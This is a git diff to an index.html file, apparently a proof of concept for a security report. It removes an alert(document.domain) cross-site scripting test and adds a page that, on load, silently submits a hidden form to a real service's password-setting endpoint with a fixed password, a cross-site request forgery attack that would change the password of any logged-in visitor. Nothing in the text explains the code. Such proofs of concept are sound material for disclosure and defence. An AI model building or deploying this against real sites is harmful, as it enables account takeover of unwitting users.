--- a/index.html
+++ b/index.html
@@ -1,11 +1,12 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
-    <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Document</title>
+  <meta charset="UTF-8">
+  <title>Auto Submit Form</title>
 </head>
-<body>
-    <script>alert(document.domain)</script>
+<body onload="document.getElementById('autoForm').submit();">
+  <form id="autoForm" action="https://www.nutaku.com/sso/ajax/set-nutaku-password/" method="POST">
+    <input type="hidden" name="password" value="helloworld">
+  </form>
 </body>
 </html>
